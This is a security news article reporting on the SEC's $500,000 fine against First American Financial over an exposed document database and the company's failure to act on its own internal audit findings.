Title insurance is not mandated by law, but most lenders require it as part of any mortgage transaction. In other words, if you wish to take out a mortgage on a home you will not be able to do so without giving companies like First American gobs of documents about your income, assets and liabilities — including quite a bit of sensitive financial data.

Aside from its core business competency — checking to make sure the property at issue in any real estate transaction is unencumbered by any liens or other legal claims against it — First American basically has one job: Protect the privacy and security of all these documents.

A redacted screenshot of one of many millions of sensitive records exposed by First American’s Web site.

It’s easy to see why companies like First American might not view protecting this data as sacrosanct, as the entire industry’s incentive for safeguarding all those sensitive documents is somewhat misaligned.

That is to say, in the title insurance industry the parties to a real estate transaction aren’t customers, but rather they are are the product. The actual customers of the title insurance companies are principally the banks which back these mortgage transactions.

We see a similar dynamic with social media platforms, where the “user” is not the customer at all but the product whose data is being bought and sold by these platforms.

Roughly five months before KrebsOnSecurity notified First American that anyone with a web browser could view sensitive document in its “Eagle Pro” database online just by changing some characters at the end of a link, an internal security audit at First American flagged the exact same vulnerability.

But the company never acted to fix it until the news media came calling.

The SEC’s administrative proceeding (PDF) explains how things slipped through the cracks. Under First American’s documented vulnerability remediation policies, the data leak was classified as a security weakness with a “level 3” severity, which placed it in the “medium risk” category and required remediation within 45 days.

But rather than recording the vulnerability as a level 3 severity, due to a clerical error the vulnerability was erroneously entered as a level 2 or “low risk” severity in First American’s automated tracking system. Level 2 issues required remediation within 90 days. Even so, First American missed that mark.

The SEC said that under First American’s remediation policies, if the person responsible for fixing the problem is unable to do so based on the timeframes listed above, that employee must have their management contact the company’s information security department to discuss their remediation plan and proposed time estimate.

“If it is not technically possible to remediate the vulnerability, or if remediation is cost prohibitive, the [employee] and their management must contact Information Security to obtain a waiver or risk acceptance approval from the CISO,” the SEC explained. “The [employee] did not request a waiver or risk acceptance from the CISO.”

So, someone within First American accepted the risk, but that person neglected to ensure the higher-ups within the company also were comfortable with that risk. It’s difficult not to hum a tune whenever the phrase “accepted the risk” comes up if you’ve ever seen this excellent infosec industry parody.

The SEC took aim at First American because a few days after our May 24, 2019 story ran, the company issued an 8-K filing with the agency stating First American had no prior indication of any vulnerability.

“That statement demonstrated that First American’s senior management was not properly informed of the prior report of a vulnerability and a failure to remediate the problem,” wrote Michael Volkov, a 30-year federal prosecutor who now runs The Volkov Law Group in Washington, D.C.

Reporting for Reuters Regulatory Intelligence, Richard Satran says the SEC charged First American with violating Rule 13a-15(a) of the Exchange Act.

“The rule broadly requires firms involved in securities issuance to have a compliance process in place to assure material information follows securities laws,” Satran wrote. “The SEC avoided getting into the specific details of the breach and instead focused on the way its disclosure was handled.”

Mark Rasch, also former federal prosecutor in Washington, said the SEC is signaling with this action that it intends to take on more cases in which companies flub security governance in some big way.

“It’s a win for the SEC, and for First America, but it’s hardly justice,” Rasch said. “It’s a paltry fine, and it involves no admission of guilt by First American.”

Rasch said First American’s first problem was labeling the weakness as a medium risk.

“This is lots of sensitive data you’re exposing to anyone with a web browser,” Rasch said. “That’s a high-risk vulnerability. It also means you probably don’t know whether or not anyone has accessed that data. There’s no way to tell unless you can go back through all your logs all those years.”

The SEC said the 800 million+ records had been publicly available on First American’s website since 2013. In August 2019, the company said a third-party investigation into the exposure identified just 32 consumers whose non-public personal information likely was accessed without authorization.

When KrebsOnSecurity asked how long it maintained access logs or how far back in time that review went, First American declined to be more specific, saying only that its logs covered a period that was typical for a company of its size and nature.

However, documents from New York financial regulators show First American was unable to determine whether records were accessed prior to Jun 2018 (one year prior to fixing the weakness).

The records exposed by First American would have been a virtual gold mine for phishers and scammers involved in Business Email Compromise (BEC) scams, which often impersonate real estate agents, closing agencies, title and escrow firms in a bid to trick property buyers into wiring funds to fraudsters. According to the FBI, BEC scams are the most costly form of cybercrime today.

First American is not out of the regulatory woods yet from this enormous data leak. In July 2020, the New York State Department of Financial Services announced the company was the target of their first ever cybersecurity enforcement action in connection with the incident, charges that could bring steep financial penalties. That inquiry is ongoing.

The DFS considers each instance of exposed personal information a separate violation, and the company faces penalties of up to $1,000 per violation. According to the SEC, First American’s EaglePro database contained tens of millions of document images that included non-public personal information.

First American Financial Pays Farcical $500K Fine